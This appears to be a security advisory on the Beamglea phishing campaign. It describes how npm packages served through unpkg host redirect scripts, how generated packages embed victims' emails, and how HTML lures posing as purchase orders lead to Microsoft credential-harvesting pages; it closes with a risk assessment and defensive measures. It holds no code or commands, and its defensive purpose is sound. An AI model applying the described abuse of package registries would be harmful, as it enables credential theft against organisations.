The Beamglea phishing campaign employs 175 malicious npm packages that have collectively been downloaded approximately 26,000 times. These packages are not malicious in the traditional sense of executing harmful code upon installation; instead, they serve as hosting infrastructure for phishing redirect scripts. The attackers use npm's public registry and the unpkg.com CDN to host JavaScript redirect files embedded in HTML documents. A Python script named "redirect_generator.py" automates the creation and publication of npm packages with randomized names containing victim-specific email addresses and phishing URLs. Once published, these packages host JavaScript files (e.g., beamglea.js) that redirect victims to Microsoft credential harvesting pages. The campaign distributes over 630 HTML files masquerading as legitimate business documents such as purchase orders or technical specifications. When victims open these HTML files in a browser, the embedded JavaScript immediately redirects them to phishing domains with their email pre-filled, increasing the attack's credibility and success rate. The campaign targets more than 135 companies in industrial, technology, and energy sectors worldwide, leveraging the npm ecosystem and unpkg CDN to create a resilient, low-cost phishing infrastructure. This approach exploits the trust developers and organizations place in npm packages and CDN-hosted content, highlighting a novel abuse of software supply chain infrastructure without direct exploitation of software vulnerabilities. The campaign was first flagged by researchers in late September 2025 and underscores the evolving tactics of threat actors to use legitimate platforms for malicious purposes.

European organizations, especially those in industrial, technology, and energy sectors, face significant risk from this campaign. The use of trusted npm packages and CDN infrastructure lowers suspicion and increases the likelihood of successful credential theft, potentially leading to unauthorized access to corporate systems, intellectual property theft, and disruption of critical services. Credential compromise can facilitate further attacks such as lateral movement, ransomware deployment, or espionage. The pre-filled email addresses in phishing pages enhance the credibility of the attack, increasing user susceptibility. The campaign's reliance on legitimate infrastructure complicates detection and mitigation, potentially leading to prolonged exposure. Given the targeting of strategic sectors, successful breaches could have cascading effects on supply chains and critical infrastructure within Europe. Additionally, the abuse of open-source ecosystems may erode trust in software supply chains, impacting development and deployment practices across European organizations.

European organizations should implement advanced supply chain security measures, including continuous monitoring and auditing of npm packages used in development environments. Employ strict policies to restrict or vet third-party package usage, especially those with randomized or suspicious names. Integrate automated tools to detect unusual package publication patterns and CDN-hosted redirect scripts. Enhance email security controls to detect and quarantine suspicious HTML attachments, including sandboxing and content disarming. Conduct targeted user awareness training focusing on phishing attacks involving pre-filled credentials and suspicious document attachments. Employ multi-factor authentication (MFA) to reduce the impact of credential compromise. Collaborate with npm registry maintainers and CDN providers to report and expedite takedown of malicious packages. Implement network-level protections such as DNS filtering and web proxy controls to block known phishing domains. Finally, develop incident response playbooks specifically addressing supply chain phishing campaigns leveraging developer ecosystems.